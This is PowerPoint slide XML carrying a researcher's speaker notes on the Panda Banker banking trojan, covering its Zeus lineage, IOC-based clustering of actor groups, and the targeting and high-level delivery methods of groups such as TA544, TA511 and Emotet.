        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>69</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2839017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way to see this lineage, and a generally useful exercise anyway, is to map the Zeus function names from the source code onto Panda Banker functions in IDA Pro or a similar reversing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quite a bit of overlap with Zeus, but at the same time, quite a bit that’s different. As we get to them, I’ll point out some of the major differences.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27612986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second most popular kit is called grab. This kit actually comes in a bunch of different variants, but an example snippet of webinject code looks something like this.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>70</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40760778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Sometimes the name of a kit isn’t readily available from the webinject or panel... this one I call ”r equals” and it’s a fairly popular kit used with Panda as well.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>71</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2957858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that’s enough IDA Pro screenshots for now… I wanted switch gears again and talk about some of the campaigns and groups associated with Panda Banker.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>72</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="156189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guess one of the first questions to ask is whether Panda Banker is distributed, controlled, and used by a single threat actor or are there multiple distinct actors using it? It’s my understanding that like a lot of other banking malware, especially Zeus based banking malware, Panda Banker is packaged up and sold to other threat actors to use as they see fit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>I’m not an authoritative researcher on underground forum tracking and intel, but from the little I’ve seen there is a threat actor out there on some of the underground forums who claims to be the Panda Banker developer. I don’t believe there’s an explicit advertisement for the malware on the forums, it’s more word of mouth and interested parties reach out to the developer via the forum, jabber, or some other means and they negotiate the transaction behind the scenes.</a:t>
            </a:r>
          </a:p>
          <a:p>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73</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10654276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organizing samples into groups, I tend to focus on these IOCs, some are better than others. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As samples age of course, it becomes more and more difficult to sort through them because of things likes:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sinkholes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lack of data on distribution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C2s have long since died</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Whois, DNS, and TLS are generally less useful the older the samples get</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>74</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16278548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IOC overlap, I’ve come up with around 100 groups, here are the top 50. Even with a conservative grouping strategy, I believe this is an overestimate and there are fewer actual groups.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>75</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24030036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a few slides ago, Panda Banker samples contain an RSA public key in their BaseConfig. The way the public key is used in the C2 protocol implies that the Panda Banker C2 panel contains the RSA private key.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>One possible scenario is that every time Panda Banker is sold, a new RSA key pair is created and associated with that sale. So using this assumption there could possibly be up to 67 unique groups.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So somewhere between 67 and 100 groups would be my very high-end estimate.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>I’m not going to go through every group, but I did want to highlight a few interesting ones</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>76</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6904936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with the group associated with the oldest Panda Banker sample. I don’t think it’s too far fetched to assume that this first contact group may be associated with the developer of the malware, but even if it’s not, a very early adopter of Panda Banker is still pretty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not much IOC overlap in these early samples, but the BaseConfig key hash does tie together around 80 samples from January 2016 to April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few of the botnets and dynamic config filenames imply these are testing samples. Furthermore, sometimes Panda Banker samples are compiled with debug logging turned on and the first time this happened was in a sample within this group implying the threat actor behind it might have had access to Panda Banker’s source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77</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38113428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don’t have much distribution data for this group. In 2018 Proofpoint saw the latest sample being delivered in an email campaign linking to a Word document hosted on Dropbox. The Word document contained macros which when enabled downloaded Smoke Loader which then downloaded Panda Banker.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a blog from Flashpoint, the Word document was created using the “Rubella Macro Builder”.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>78</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="434112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Likewise, I don’t have much targeting information for this group. In 2017 they were using about 40 webinjects targeting mostly Canada.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>79</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4264471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oldest sample of Panda Banker that I’ve been able to find is this one. It was submitted to VirusTotal on January 27</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, 2016 by someone from Norway. So that makes Panda Banker about 3 years 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talk more about versions and botnet names in a few slides, but this sample was version 2.1.0 and used the name “newtest”. So this was very likely a test or development sample.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32343886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group I want to look at was very active for about a year starting in August 2017 and they mostly targeted Italy.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characteristic of this group is that a lot of their hardcoded primary C2 domains overlapped with their DGA generated domains.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used quite a few distinct botnet names with “armata” being the most popular.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>80</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22952016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Proofpoint we label financially motivated threat actors with a TA5XX name. For this actor we track it as TA544. In general their distribution mechanism is to send emails with Microsoft Word or Excel documents attached. The documents contain macros that when enabled, cybercrime.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seen this actor distribute quite a few types of banking malware in addition to Panda Banker including Nymaim, Ursnif, Chthonic, Zloader, and URLZone and sometimes they use an intermediate Smoke Loader to load the banking malware.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quite likely that this group is a malware distributer that sends out various malware on behalf of other threat actors.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>81</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34158296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Panda Banker, they had anywhere from 20-100 webinjects targeting financial institutions mostly in Italy. They made use of quite a few webinject kits as well.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>82</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41542261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September 2018 there was an update to a Panda Banker blog post by a company called Re-aqta that mentions a possible take down of the infrastructure associated with this Panda Banker group. I haven’t heard of any further details, but I think it’s worth mentioning as a possible reason for their lack of Panda Banker activity in recent months.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said, at Proofpoint, we are still see banking malware activity from this actor, just not Panda Banker activity.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>83</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2624340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newer groups to use Panda Banker was this one. They started using it in March 2018 and then switched to a different banking malware, the Kronos variant known as Osiris, at the end of July. So they didn’t use Panda for very long.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84</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8157181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distribution method was to use 2 exploit kits, GrandSoft and Rig, to deliver Panda directly or sometimes indirectly using an intermediate Smoke Loader.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>85</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24118278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probably guess by the nickname I use, they used about 30 webinjects to target financial institutions in Japan.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>86</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9126558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personally haven’t done much tracking of the Emotet botnet, but I do know that it does drop Panda Banker from time-to-time. At Proofpoint we track Emotet as TA542 and in general it’s pretty active doing Emotet things.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>87</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10474620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it does drop Panda Banker, there have been anywhere from 30 – 180 webinjects targeting financial institutions mostly in the US and Canada.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>88</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28368105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popular group that uses Panda Banker is the Hancitor gang. At Proofpoint we track this one under TA511.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 in October 2017, this group switched from dropping the Zeus variant known as Zloader to Panda Banker.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>89</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2006641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few months later, in April 2016, Proofpoint released the first blog post about Panda Banker that I’m aware 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blog credits Fox-IT InTELL with discovery of the malware and that was in February 2016…just a few days after the oldest sample was submitted in the wild.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{77B5D341-E1F3-3B47-9946-5D39F3FD3C0B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22033098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general, TA511 has a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register new Panda Banker C2s and generate new Let’s Encrypt TLS certificates in the beginning of the week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send emails Monday thru Thursday containing MS Word documents or links to MS Word documents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daily email campaigns and documents have a theme such as spoofing the IRS, various shipping companies, or various e-commerce sites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Word documents contain macros that when enabled download and execute the Hancitor downloader malware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Hancitor downloads Panda Banker along with a couple of other malwares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90</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
